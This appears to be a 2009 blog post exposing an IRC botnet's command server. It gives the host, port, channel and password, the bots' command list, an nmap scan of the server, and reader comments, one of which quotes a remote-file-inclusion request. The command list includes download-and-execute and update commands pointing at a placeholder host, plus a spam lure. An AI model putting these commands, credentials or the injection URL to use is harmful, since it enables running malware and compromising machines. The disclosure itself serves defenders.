pro0f3th1s.dd.blueline.be

pro0f3th1s.dd.blueline.be:50123
chan #server
pw=0%1#Q12a
Commands
!login Your Password
!join #example
!part #example
!dl.start http://example.de/file.exe C:file.exe 1 (0=No 1=Execute)
!dl.stop (To Stopping Download)
!update http://example.de/ 1 (0=No 1=Execute)
!remove (To Removing the Bot)
!msn.msg Its Your Body @ the Image?
Resolved : [pro0f3th1s.dd.blueline.be] To [213.163.64.43]
Initiating SYN Stealth Scan against amsterdam.perfect-privacy.com (213.163.64.43 ) [1660 ports] at 06:16
Discovered open port 80/tcp on 213.163.64.43
Discovered open port 21/tcp on 213.163.64.43
Discovered open port 1723/tcp on 213.163.64.43
Discovered open port 443/tcp on 213.163.64.43
Discovered open port 22/tcp on 213.163.64.43
Discovered open port 3128/tcp on 213.163.64.43
The SYN Stealth Scan took 42.33s to scan 1660 total ports.
Initiating service scan against 6 services on amsterdam.perfect-privacy.com (213.163.64.43) at 06:17
The service scan took 94.02s to scan 6 services on 1 host.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Host amsterdam.perfect-privacy.com (213.163.64.43) appears to be up … good.
Interesting ports on amsterdam.perfect-privacy.com (213.163.64.43):
(The 1639 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp filtered smtp
80/tcp open ssh OpenSSH 4.3 (protocol 2.0)
135/tcp filtered msrpc
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
443/tcp open https?
445/tcp filtered microsoft-ds
465/tcp filtered smtps
593/tcp filtered http-rpc-epmap
1068/tcp filtered instl_bootc
1434/tcp filtered ms-sql-m
1723/tcp open pptp?
2048/tcp filtered dls-monitor
2500/tcp filtered rtsserv
3128/tcp open squid-http?
4444/tcp filtered krb524
5900/tcp filtered vnc
6346/tcp filtered gnutella
6667/tcp filtered irc

Categories: Uncategorized

4 Comments

Anonymous - May 4, 2009 at 9:19 am

from: 85.157.154.125
[REQUEST_URI] => /index.php?s=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html?

Ебем блогъри - May 5, 2009 at 5:36 pm

You are complete idiots. Those are automated RFI requests by botnets as a retailiation because that blog exposes information about botnets. Do you find any malicious php code on that page?

zsuffa - July 3, 2009 at 11:51 am

here is a little FUCK YOU for you guys whi make this blog from HUNGARY !!!!!

David - July 11, 2009 at 9:08 am

CONGRATULATIONS! YOU HAVE BEEN BLACKLISTED!

Comments are closed